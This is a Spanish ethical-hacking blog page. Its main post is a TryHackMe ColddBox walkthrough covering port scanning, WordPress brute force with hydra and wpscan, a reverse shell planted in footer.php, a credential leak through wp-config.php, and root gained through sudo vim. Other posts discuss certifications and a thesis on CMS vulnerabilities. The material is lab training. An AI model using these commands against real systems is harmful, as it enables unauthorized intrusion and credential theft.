martes, 8 de abril de 2025

WriteUp ColddBox - TryHackme

En este writeup exploraremos la máquina ColdBox de TryHackMe, una sala de dificultad facil que pone a prueba nuestras habilidades en reconocimiento, análisis de servicios expuestos y explotación de vulnerabilidades en entornos web.

Nivel > #Facil

Plataforma #tryhackme

------------------------------------------------------------

Skills: 

- wordpress enumeration

- Reverse shell

- Fuzzing

 - Escalada de privilegios "permisos sudo"

-------------------------------------------------------------

#VPN


Como esta es una maquina de tryhackme es necesario descargar el archivo vpn en la zona de profile -acces - descargar y ejecutamos 


```

openvpn tu_archivo_vpn.ovpn

``` 


Creamos directorios y subdirectorios para organizar la evidencia 


#enumeracion 


1. Lo primero como siempre es conocer los puertos y servicios que corren bajo la aplicación.

```

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn  10.10.33.83 -oG allports

```



2. Extraemos los puertos a la clipboard

```

extractPorts allports

```



3. Realizamos un escaneo profundo para verificar servicios y versión de los mismos.


```

nmap -sCV -p80,4512 10.10.33.83 -oN targeted 

```



4. como hay un puerto 80 verificamos en navegador y podemos observar que es un wordpress

 


5. Identificamos con waapalizer o whatweb y es un wordpress 4.1.23



6. se realiza fuzzing para tratar de encontrar directorios.


```

gobuster dir -u http://10.10.33.83/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

```



7. se encuentra el directorio /Hidden/ que nos brinda 3 posibles usuarios c0ldd, phillip y Hugo

![[Pasted image 20250308003220.png]]


8. realizamos ataque de fuerza bruta para tratar de adivinar la contraseña de wordpress.


a. Con hydra

```

hydra -l c0ldd -P /usr/share/wordlists/rockyou.txt 10.10.33.83 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=incorrect"

```



b. con wpscan

```

wpscan --url http://10.10.33.83/ -U C0ldd -P /usr/share/wordlists/rockyou.txt

```



1.  Nos fogueamos en WordPress y una vez en el panel de administración nos dirigimos a _apariencia_ - Temas - Editar y en la seccion footer.php (esta no cuenta con 404 funcional) pegamos la reversehll que podemos generar desde la pagina https://www.revshells.com/




nota: en la aplicación revshells generamos una revershell monkey, procedemos a ponernos en escucha con el puerto definido en la shell.




```

nc -lvnp 9001

```




En este caso no haremos tratamiento tty, pues lo intente en varias ocasiones y no podia explotar el binario VIM que posee permisos sudo. por esta razon invocaremos el python 


```

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

```




En este punto exploramos carpetas, hasta llegar a la carpeta que contiene el wordpress /var/www/html y alli buscamos el archivo wp-config.php , al darle cat podemos observar que contiene credenciales de la BD en este caso c0ldd : cybersecurity




También podremos encontrar la bandera de user.txt 




escalamos privilegios.


```

su c0ldd

password: cybersecurity

```


y ejecutamos un sudo -l para saber que puede ejecutar el usuario c0ldd como root




En este caso vemos que puede ejecutar el binario VIM , en la pagina https://gtfobins.github.io/ puedo conocer para que sirve y la manera de explotar cada binario. en este caso y por las características del permiso lo ejecutaremos así 


```

    sudo vim -c ':!/bin/sh'    

```




En este punto ya somos root


```

find /root/root.txt

cat /root/root.txt

```



y listo :)

Mi experiencia con la CEHPC: "Certificación Profesional de Piratería Ética – CertiProf"

 

¡Hola!


Hoy quiero compartirles una experiencia que les había prometido desde hace tiempo. Me propuse iniciar una ruta de certificaciones que suelen volverse “comunes” cuando uno empieza a profesionalizarse en un área. En mi caso, la ciberseguridad comenzó como un hobby desde la adolescencia, pero con el tiempo se convirtió en la rama a la que quiero dedicar mi esfuerzo y compromiso.

Es cierto que hay decisiones que pueden impulsar tu carrera, y otras que, sinceramente, no generan un cambio significativo en tu desarrollo actual. Como primera certificación en seguridad informática, orientada al hacking ético, elegí la CEHPC de CertiProf.

Según su página oficial, esta certificación está diseñada para brindar a los profesionales las habilidades y conocimientos necesarios para identificar, analizar y mitigar vulnerabilidades en los sistemas de seguridad de la información. Prepara a los participantes para comprender y aplicar técnicas de hacking ético, fundamentales para proteger redes y datos frente a atacantes maliciosos.

En resumen, es una certificación introductoria, pero bastante completa a nivel teórico. Te permite conocer los métodos de ataque más comunes, entender sus motivos y vectores. Si eres un profesional que quiere adentrarse al mundo de la ciberseguridad, es un buen punto de partida.

 

Mi entrenamiento para la certificación

La verdad, sí me puse nervioso. En 2024 tomé la decisión de certificar mis conocimientos en hacking —fueran muchos o pocos— y no quería arriesgarme a perder dinero, así que decidí comenzar desde la base.

Tomé un entrenamiento con Hacker Mentor, una empresa ecuatoriana con profesores muy bien calificados. Su metodología era gamificada, es decir, ibas escalando niveles como si fuera un videojuego. El curso que tomé se llamaba PMJ (Pentester Mentor Junior). En ese momento decían que sería la última edición; no sé si fue una estrategia de marketing o si realmente dejaron de ofrecerlo.

Pero debo decir que valió totalmente la pena. Se abordaban temas como intrusión web, análisis de vulnerabilidades en sistemas operativos y ataques de fuerza bruta. Estos son conocimientos clave para avanzar a certificaciones más prácticas y técnicas.
¡Un saludo a los amigos de Hacker Mentor, si algún día llegan a leer esto!


¿Cómo apruebo la CEHPC?

En realidad, es un proceso bastante sencillo. Solo necesitas estudiar el material en PDF que la misma academia proporciona. El examen es 100% teórico, no hay pruebas técnicas, así que lo mejor que puedes hacer es tomar apuntes mientras estudias. Luego, al repasar tus notas, estarás más que preparado para presentar la certificación.

El examen cuesta 150 USD, aunque tengo entendido que frecuentemente lanzan promociones con precios más bajos.

 



Al Final, tu decides que es bueno para ti y que riesgos quieres afrontar, no importa si para unos es complicado o por el contrario es un juego de niños, recuerda que tu eres tu objetivo a vencer, no los demás.

 

Saludos Hackers!

viernes, 7 de marzo de 2025

Las certificaciones en el mundo del hacking

 

He mencionado muchas veces mi trayectoria en el mundo de la informática y la tecnología. A lo largo de los años, he trabajado en diversas áreas, desde soporte técnico, diseño e implementación de redes, configuración de equipos de último kilómetro, desarrollo de software y gestión de políticas públicas, hasta especializarme en mi campo actual: el hacking ético.

La informática es un universo interconectado. Aunque existen múltiples ramas, he llegado a un punto en el que todo converge, permitiéndome desarrollar mi trabajo con mayor claridad y sin dejar de aprender. Con la misión de fortalecer mi currículum, investigué sobre las certificaciones más relevantes en ciberseguridad, aquellas que pueden definir el roadmap de un entusiasta o profesional que quiera dedicarse a la seguridad informática.

Dado que muchas de estas certificaciones requieren una inversión considerable, he decidido documentar mi preparación para cada una. Mi objetivo es compartir con ustedes mis experiencias, write-ups y walkthroughs, además de ofrecer una síntesis de los conceptos clave abordados en cada certificación.



Certificaciones en hacking

Esta lista surge de una investigación exhaustiva y, aunque es una selección personal, está basada en la relevancia y demanda del mercado. A continuación, presento las certificaciones más populares en el ámbito de la seguridad informática:

1. CEHPC – Ethical Hacker Professional Certification (CertiProf)

Esta certificación es la más económica y accesible de todas, ideal para quienes desean iniciar en el mundo del hacking. Aunque su enfoque es teórico y no práctico, proporciona una base sólida en los conceptos fundamentales de la seguridad informática, esenciales para desarrollar un conocimiento estructurado.

2. ISO 27001 – Auditor Interno

Esta certificación es crucial para cualquier entidad, ya que enseña sobre cumplimiento normativo y regulatorio, optimización de procesos internos y mejora en la seguridad de la información. Es una opción recomendada para quienes buscan especializarse en gestión de seguridad y cumplimiento.

3. eJPT – eLearnSecurity Junior Penetration Tester (INE)

Aquí el nivel de complejidad aumenta, ya que se trata de una certificación práctica en la que se deben emular ataques utilizados en entornos reales. Su enfoque principal está en el hacking web, escalación de privilegios y pruebas de penetración en redes y sistemas.

4. CEH – Certified Ethical Hacker (EC-Council)

Esta certificación valida las habilidades de un profesional en seguridad ofensiva, permitiéndole identificar y corregir vulnerabilidades antes de que sean explotadas por atacantes. Es una de las certificaciones más reconocidas a nivel internacional y un estándar en la industria.

5. eCCPT – eLearnSecurity Certified Professional Penetration Tester (INE)

La eCCPT es una excelente opción para quienes desean especializarse en hacking ético y pruebas de penetración con un enfoque práctico y didáctico. Se encuentra en un punto intermedio entre la CEH y la OSCP, proporcionando un aprendizaje estructurado y accesible.

6. OSCP – Offensive Security Certified Professional (Offensive Security)

Considerada una de las certificaciones más prestigiosas en el mundo del hacking, la OSCP se enfoca en habilidades prácticas avanzadas para la explotación de sistemas. Su examen es uno de los más desafiantes del sector, exigiendo un alto nivel técnico y metodológico.

Reflexión final

Es importante aclarar que una certificación no garantiza automáticamente una oportunidad laboral, pero sin duda es una excelente manera de actualizar conocimientos y fortalecer el perfil profesional.

Pronto compartiré mi preparación y experiencias con cada una de estas certificaciones.

¡Saludos, hackers!

 

sábado, 22 de febrero de 2025

Análisis de la Ciberseguridad en Gestores de Contenido Digital y Multimedial en Aplicaciones Web

 

Sí, el título es un poco extenso, pero este es mi proyecto de grado en ciberseguridad. Se trata de una investigación que explora las vulnerabilidades más comunes en gestores de contenido digital y cómo pueden ser explotadas por atacantes.

Estoy seguro de que personas más experimentadas encontrarán valiosos aportes aquí, mientras que otros quizá lo vean como algo básico. Incluso sé que en unos años miraré atrás y notaré cuánto he avanzado. Pero hoy, me siento orgulloso de compartir este trabajo, porque representa mi esfuerzo y dedicación en el mundo de la seguridad informática.


Repositorio de proyectos Corporacion universitaria de Ciencia y Desarrollo Uniciencia

¿De qué trata el proyecto?


Este estudio analiza las vulnerabilidades más comunes en gestores de contenido como WordPress, Drupal y Joomla, plataformas ampliamente utilizadas por empresas y PYMEs en Colombia.

Los datos recopilados muestran que, aunque muchas de estas vulnerabilidades han sido reportadas y parcheadas, un gran número de sitios web sigue sin aplicar actualizaciones críticas. Esto expone a las organizaciones a riesgos graves en términos de integridad, disponibilidad y confidencialidad de la información.

El objetivo de la investigación es no solo identificar las debilidades de seguridad, sino también demostrar, a través de un proceso de explotación controlada, cómo los atacantes pueden aprovechar estas fallas. De esta forma, buscamos generar conciencia y fomentar buenas prácticas en ciberseguridad.


¿Qué aprendí en el proceso?

Durante esta investigación, reforcé conocimientos en scripting en Linux y desarrollo en PHP, pero lo más interesante fue profundizar en técnicas de hacking ético enfocadas en WordPress, como el abuso del archivo XML-RPC (Abusing xmlrpc).

Hasta la versión 6 de WordPress, este archivo permitía la comunicación interna del sistema, función que hoy cumplen las API modernas. Sin embargo, al no configurarse adecuadamente, sigue siendo un punto de entrada para atacantes.

Además, logré ejecutar Remote Code Execution (RCE) en distintas máquinas y explotar fallos en el kernel de los sistemas operativos, lo que permitió obtener acceso y escalación de privilegios. Todo esto se realizó mediante reverse shells, aprovechando vulnerabilidades en plugins inseguros o configuraciones erróneas del servidor.


¿Rompí alguna ley en este proceso?


La respuesta es un rotundo NO… Por ahora 😏 , es broma,  Todas las pruebas se llevaron a cabo en entornos controlados, diseñados para simular escenarios reales sin afectar sistemas en producción.

Para ello, utilicé máquinas de la plataforma VulnHub, ideales para entrenar habilidades de pentesting y hacking ético. Próximamente, estaré publicando write-ups de mis análisis, por si alguien está interesado en aprender más sobre ciberseguridad ofensiva.

Porque sí, los hackers en acción también están en Bucaramanga. Y estamos aquí para demostrarlo. 😎










WriteUp ColddBox - TryHackme

En este writeup exploraremos la máquina ColdBox de TryHackMe , una sala de dificultad facil que pone a prueba nuestras habilidades en recon...